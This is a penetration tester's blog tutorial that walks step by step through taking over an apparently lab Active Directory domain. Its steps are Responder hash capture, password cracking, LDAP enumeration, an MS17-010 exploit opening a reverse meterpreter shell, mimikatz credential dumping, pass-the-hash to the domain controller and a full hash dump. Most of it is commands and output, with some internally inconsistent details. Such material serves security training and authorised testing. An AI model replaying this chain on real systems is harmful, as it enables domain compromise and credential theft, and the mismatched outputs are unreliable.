Auditing Microsoft Domain Environment

Contents

About the Author
About The Microsoft Domain Environments
About Auditing
Gaining First User
Enumerating AD Users and Groups With Gained User
Checking Common Vulnerabilities
Gaining First Shell
Migrating Into A Process
Pass The Hash
Dump Everything From Domain Controller

About the Author

Engin Demirbilek, Computer Engineering Student, Penetration Tester in Turkey at SiberAsist Cyber Security Consultancy.
Blog: https://engindemirbilek.github.io
Feel free to ask me anything via Twitter: @hyal0id
I've been writing this article just to spend some time, so it won't be a very detailed document.
About The Microsoft Domain Environments:

What to expect in a Domain Environment:

Mother Servers: servers that run Active Directory services, aka Domain Controllers.
Child Servers: Microsoft servers that deal with specific needs (IIS Server, MSSQL Server etc.).
Client Machines: for the use of clients (Win7, Win10 etc.).
Domain Admin Group Users: users with the highest privilege level in the Domain forest, which can control all computers in the domain forest.
Other Groups and Users: users created by Domain Admin users for specific privileges.

** A local user of a Client Machine or Child Server is not an AD user, but by using that user an AD user can be gained. **

A Domain Controller authenticates and authorizes all users and computers in a Windows Domain Forest; it can enforce security policies for all computers and can also install or update software. Just as it sounds, every local administrator user of a Domain Controller is basically a Domain Admin. By using these users, all the jobs described above can be done from any computer of the Domain Forest (without accessing the DC remotely).

Schema & More Detail: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/using-the-organizational-domain-forest-model

About Auditing:

Our golden mission is capturing a Domain Admin user in order to gain complete control of all Domain computers. But in some scenarios, users with lower privilege levels can lead to huge information leaks. Therefore, on the way to capturing a Domain Admin user, we try to gain as many users as we can.

In internal penetration tests, companies usually provide strictly low-privileged Active Directory users to penetration testers, and sometimes we also gain a few users by exploiting vulnerabilities, sniffing & spoofing attacks, social engineering attacks, password attacks etc. By using those users we compromise the whole domain forest.

In this article, I will show a few ways I've been using in penetration tests against Microsoft Domain Environments.
Gaining First User:

Usually, if I'm not in an isolated LAN network, I try LLMNR & NBT-NS spoofing attacks in order to gain an account. To do so, there is a great tool called Responder. If you are new to this topic, here is a quick 101:

LLMNR: Link-Local Multicast Name Resolution (LLMNR) is a protocol defined in RFC 4795 that allows both IPv6 and IPv4 hosts to perform name resolution for the names of neighboring computers without requiring a DNS server or DNS client configuration.

NBT-NS is a similar protocol to LLMNR that serves the same purpose. The main difference between the two is that NBT-NS works over IPv4 only.

LLMNR & NBT-NS Spoofing: Whenever a user tries to reach a non-existent share or computer which cannot be found by DNS queries, the user asks the whole network "Anyone knows where \\sharepoint is?" using LLMNR queries. Pretty much as it sounds, if an attacker answers "Yeah, it's right here", the attacker can capture the user's NTLM/NTLMv2 hashes as soon as the user (victim) tries to connect to the attacker's machine.

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

Setting Up Spoofing Environment:

As we mentioned before, there is a great tool for performing this job. In the default Kali Linux setup, you can reach Responder by typing Responder in your terminal. It uses an SMB server to capture NTLM hashes, so stop your smb service if it's running (service smbd stop).

root@kali:~# /usr/share/responder/Responder.py -I eth0 -wrf

  NBT-NS, LLMNR & MDNS Responder 2.3.3.9
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]

https://github.com/SpiderLabs/Responder

After setting up Responder, whenever a user tries to reach a non-existent share:

[*] [NBT-NS] Poisoned answer sent to 10.0.0.6 for name TYPOSHARE (service: File Server)
[SMBv2] NTLMv2-SSP Client   : 10.0.0.6
[SMBv2] NTLMv2-SSP Username : LAB\Hyaloid
[SMBv2] NTLMv2-SSP Hash     : Hyaloid::LAB:c3b7e6d03aa1156d:1A448B8D1980D5340FB2DCBED2DBE2E6:0101000000000000C0653150DE09D20185B1280D074FA54E000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000741131348AABA897DC58E88D7CEFEF3374D1A422C4BC2A2A34D085E14BD2A0F00A0010000000000000000000000000000000000009001C0063006900660073002F005400790070006F0053006800610072006500000000000000000000000000

We get his NTLMv2 hash.
Cracking NTLMv2 Hash:

root@kali:~# john hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Rules/masks using ISO-8859-1
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password5        (Hyaloid)
1g 0:00:00:00 DONE 2/3 (2018-12-17 16:19) 3.125g/s 323678p/s 323678c/s 323678C/s Password5
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Enumerating AD Users and Groups With Gained User:

We captured a user, so what's next? After capturing a user, the first thing we need to do is check its privileges; in this article we will be pretending that the user we captured has very low privilege. Let's say that we didn't get further (privesc etc.) with these privileges. Even if we can't elevate our privileges with the user we captured, we can still enumerate Active Directory users, computers, groups etc. by using LDAP queries for further investigation. To do so I'm using a script from GitHub called windapsearch, which can perform many LDAP jobs very fast.
Enumerating AD Users with LDAP queries via windapsearch:

root@kali:/opt/windapsearch# python windapsearch.py --domain LAB.COM --dc-ip 10.0.0.1 -u LAB\\hyaloid -p Password5 -U
[+] Using Domain Controller at: 10.0.0.1
[+] Getting defaultNamingContext from RootDSE
[+]     Found: DC=LAB,DC=COM
[+] Attempting bind
[+]     ...success! Binded as:
[+]      u:LAB\Hyaloid

[+] Enumerating all AD users
[+]     Found 7 users:

cn: Administrator
cn: Guest
cn: krbtgt
cn: pentest
cn: DA
cn: Hyaloid
cn: Siberasist

https://github.com/ropnop/windapsearch
AD: Active Directory

What Happened in Background:

(Wireshark capture of the LDAP traffic generated by windapsearch; the screenshot is not reproduced here.)
https://github.com/wireshark/wireshark
Enumerating Domain Admins with LDAP queries via windapsearch:

root@kali:/opt/windapsearch# python windapsearch.py --domain LAB.COM --dc-ip 10.0.0.1 -u LAB\\hyaloid -p Password5 --da
//* Code Omitted *//
[+]     ...success! Binded as:
[+]      u:LAB\Hyaloid

[+] Attempting to enumerate all Domain Admins
[+] Using DN: CN=Domain Admins,CN=Users.CN=Domain Admins,CN=Users,DC=LAB,DC=COM
[+]     Found 2 Domain Admins:

cn: Administrator
cn: DA

Enumerating Domain Computers with LDAP queries via windapsearch:

root@kali:/opt/windapsearch# python windapsearch.py --domain LAB.COM --dc-ip 10.0.0.1 -u LAB\\hyaloid -p Password5 -C
//* Code Omitted *//
[+]     Found: DC=LAB,DC=COM
[+] Attempting bind
[+]     ...success! Binded as:
[+]      u:LAB\Hyaloid

[+] Enumerating all AD computers
[+]     Found 3 computers:

cn, IP, dNSHostName, operatingSystem, operatingSystemVersion, operatingSystemServicePack
HACKBOX, 10.0.0.6, HACKBOX.LAB.COM, Windows 7 Ultimate, 6.1 (7601), Service Pack 1
SQLSERV, 10.0.0.2, SQLSERV.LAB.COM, Windows Server 2012 R2 Standard Evaluation, 6.3 (9600),
DCAD, 10.0.0.1, DCAD.LAB.COM, Windows Server 2012 R2 Standard Evaluation, 6.3 (9600),

What we gained with LDAP queries via windapsearch:

Users:
  Administrator   // Domain Admin
  Guest
  krbtgt
  pentest
  DA              // Domain Admin
  Hyaloid
  Siberasist

Computers:
  10.0.0.6, IT.LAB.COM        Windows 7 Ultimate
  10.0.0.2, SQLSERV.LAB.COM   Windows Server 2012 R2 Standard
  10.0.0.1, DCAD.LAB.COM      Windows Server 2012 R2 Standard

Checking Common Vulnerabilities:

As we see from above, we have a Windows 7 client and also an SQL server on the domain forest.
Let's check if the ms17_010 vulnerability exists on those systems; we must also consider checking whether the user of the mssql service suffers from basic password usage.

Checking ms17_010 vulnerability:

msf auxiliary(scanner/smb/smb_ms17_010) > set SMBUSER Hyaloid
SMBUSER => Hyaloid
msf auxiliary(scanner/smb/smb_ms17_010) > set SMBPASS Password5
SMBPASS => Password5
msf auxiliary(scanner/smb/smb_ms17_010) > set SMBDOMAIN LAB
SMBDOMAIN => LAB
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.0.0.1,2,6
RHOSTS => 10.0.0.1,2,6
msf auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.0.0.1:445 - Host does NOT appear vulnerable.
[*] Scanned 1 of 3 hosts (33% complete)
[+] 10.0.0.2:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard Evaluation 9600 x64 (64-bit)
[*] Scanned 2 of 3 hosts (66% complete)
[-] 10.0.0.6:445 - Host does NOT appear vulnerable.
[*] Scanned 3 of 3 hosts (100% complete)

Gaining First Shell:

Exploiting ms17_010 vulnerability:

msf exploit(windows/smb/ms17_010_psexec) > set SMBUSER Hyaloid
SMBUSER => Hyaloid
msf exploit(windows/smb/ms17_010_psexec) > set SMBPASS Password5
SMBPASS => Password5
msf exploit(windows/smb/ms17_010_psexec) > set SMBDOMAIN LAB
SMBDOMAIN => LAB
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 10.0.0.2
RHOST => 10.0.0.2
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.5:4444
[*] 10.0.0.2:445 - Target OS: Windows Server 2012 R2 Standard Evaluation 9600
[*] 10.0.0.2:445 - Built a write-what-where primitive...
[+] 10.0.0.2:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.0.0.2:445 - Selecting PowerShell target
[*] 10.0.0.2:445 - Executing the payload...
[+] 10.0.0.2:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.0.0.2
meterpreter >

As we successfully exploited the ms17_010 vulnerability, we gained an x86 meterpreter shell with SYSTEM privileges. In order to use tools like mimikatz, our session architecture must match the system's architecture.

Checking System Architecture:

meterpreter > sysinfo
Computer        : SQLSERV
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : LAB
Logged On Users : 9
Meterpreter     : x86/windows

As we see from the result of the sysinfo command, the system architecture is x64 but our meterpreter is x86.
Checking Background Processes:

meterpreter > ps

Process List
============

 PID   PPID  Name             Arch  Session  User                          Path
 ---   ----  ----             ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System           x64   0
 /* Code Omitted */
 464   380   services.exe     x64   0
 472   380   lsass.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 528   464   svchost.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 556   464   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 628   2484  LogonUI.exe      x64   2        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 668   464   VBoxService.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\
 /* Code Omitted */

Migrating Into A Process:

Things to Consider before Migration:
1. The process we will migrate into should run with the same privileges as our current ones (NT AUTHORITY).
2. The process we will migrate into must be stable, or at least, even if we mess something up, it must not cause a system restart etc.

To meet these requirements, VBoxService.exe looks like the best option we have.

meterpreter > migrate 668
[*] Migrating from 3168 to 668...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : WIN-G9T7SDV2G4L
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : LAB
Logged On Users : 9
Meterpreter     : x64/windows

What's Next?

To be honest, we do not need to get any user's hashes to gain domain admin rights from this point. We can check if there is a process running with the privileges of a domain admin user (one of those we found earlier with windapsearch), and migrating into that process could give us DA privileges; but in order to show a few more tricks, let's use mimikatz to dump the logged-on users' hashes.
https://github.com/gentilkiwi/mimikatz

Loading Mimikatz:

meterpreter > load kiwi
Loading extension kiwi...
  mimikatz 2.1.1 20180925 (x64/windows)
  "A La Vie, A L'Amour"
  Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
  http://blog.gentilkiwi.com/mimikatz
  Vincent LE TOUX (vincent.letoux@gmail.com)
  http://pingcastle.com / http://mysmartlogon.com
Success.

Getting password hashes with mimikatz:

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain  NTLM                              SHA1
--------          ------  ----                              ----
DA                LAB     64f12cddaa88057e06a81b54e73b949b  cba4e545b7ec918129725154b29f055e4cd5aea8
Hyaloid           LAB     a738f92b3c08b424ec2d99589a9cce60  0509c9efe1b0d6ea63697e335434302096859164
WIN-G9T7SDV2G4L$  LAB     6eaab25fb08a7382f7cc1a54d97e80de  8c02e734ed99ebdfaec174ffed707cafc4844dfa

Bingo! Remember the DA user from the windapsearch results? It is a domain admin group user.
Pass The Hash:

Passing the hash is a game-changer trick that we use at nearly every internal audit. If you are new to this topic, here is a quick 101 from Wikipedia: pass the hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case.

Pass The Hash with Psexec:

To perform this job, all we need is the NTLM hash of a privileged user. That's exactly what we gained before with mimikatz.

msf exploit(windows/smb/psexec) > set SMBUSER DA
SMBUSER => DA
msf exploit(windows/smb/psexec) > set SMBPASS 00000000000000000000000000000000:64f12cddaa88057e06a81b54e73b949b   // LM:NTLM
SMBPASS => 64f12cddaa88057e06a81b54e73b949b:64f12cddaa88057e06a81b54e73b949b
msf exploit(windows/smb/psexec) > set SMBDOMAIN LAB
SMBDOMAIN => LAB
msf exploit(windows/smb/psexec) > set RHOST 10.0.0.1   // Domain Controller
RHOST => 10.0.0.1
msf exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.0.0.5:4444
[*] 10.0.0.1:445 - Connecting to the server...
[*] 10.0.0.1:445 - Authenticating to 10.0.0.1:445|LAB as user 'DA'...
[*] 10.0.0.1:445 - Selecting PowerShell target
[*] 10.0.0.1:445 - Executing the payload...
[+] 10.0.0.1:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.0.0.1

Further Read for Pass The Hash: https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283

Dump Everything From Domain Controller:

Since we got a privileged session on the Domain Controller, we can dump everything from it!
meterpreter > load kiwi
Loading extension kiwi...
  mimikatz 2.1.1 20180925 (x64/windows)
  "A La Vie, A L'Amour"
  Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
  http://blog.gentilkiwi.com/mimikatz
  Vincent LE TOUX (vincent.letoux@gmail.com)
  http://pingcastle.com / http://mysmartlogon.com
Success.

meterpreter > getuid
Server username: LAB\DA
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:eb00cddf33274125bd6081d301c78cbc:::
pentest:1105:aad3b435b51404eeaad3b435b51404ee:c4b0e1b10c7ce2c4723b4e2407ef81a2:::
DA:1106:aad3b435b51404eeaad3b435b51404ee:7247e8d4387e76996ff3f18a34316fdd:::
Hyaloid:1107:aad3b435b51404eeaad3b435b51404ee:a738f92b3c08b424ec2d99589a9cce60:::
Siberasist:1108:aad3b435b51404eeaad3b435b51404ee:499108ff7eeea55a4765f1c57665f840:::

Conclusion:

This is not the only scenario that we meet on internal audits; there are many more scenarios that could be performed according to vulnerabilities, attack vectors, network topology, operating systems etc., but it is a very common scenario that I've met in a few pentests before.

Thanks for reading.